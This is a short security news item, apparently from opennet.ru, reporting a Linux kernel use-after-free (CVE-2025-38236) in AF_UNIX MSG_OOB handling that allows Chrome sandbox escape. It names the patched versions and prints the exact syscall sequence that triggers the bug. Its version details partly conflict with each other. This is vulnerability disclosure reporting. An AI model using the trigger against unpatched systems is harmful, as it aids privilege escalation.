Security researchers from Google have identified a vulnerability (CVE-2025-38236) in the Linux kernel that allows for privilege escalation. Among other things, the vulnerability allows for bypassing the sandbox isolation mechanism used in Google Chrome and achieving kernel-level code execution when executing code in the context of an isolated Chrome rendering process (for example, when exploiting another vulnerability in Chrome). The issue appears starting with the Linux kernel 6.9 and was fixed in Linux kernel updates 6.1.143, 6.6.96, 6.12.36, and 6.15.5. A prototype of the exploit is available for download.
The vulnerability is caused by an implementation error in the MSG_OOB flag, which can be set for AF_UNIX sockets. The MSG_OOB ("out-of-band") flag allows an additional byte to be attached to the data being sent, which the receiver can read before the rest of the data is received. This flag was added in the Linux 5.15 kernel at the request of Oracle and was proposed for deprecation last year because it was not widely used.
Chrome's sandbox implementation allowed UNIX socket operations and send()/recv() system calls where the MSG_OOB flag was allowed along with other options and was not separately filtered. A bug in the MSG_OOB implementation allowed for a use-after-free condition to occur after executing a certain sequence of system calls: char dummy; int socks[2]; socketpair(AF_UNIX, SOCK_STREAM, 0, socks); send(socks[1], "A", 1, MSG_OOB); recv(socks[0], &dummy, 1, MSG_OOB); send(socks[1], "A", 1, MSG_OOB); recv(socks[0], &dummy, 1, MSG_OOB); send(socks[1], "A", 1, MSG_OOB); recv(socks[0], &dummy, 1, 0); recv(socks[0], &dummy, 1, MSG_OOB);
Source: opennet.ru
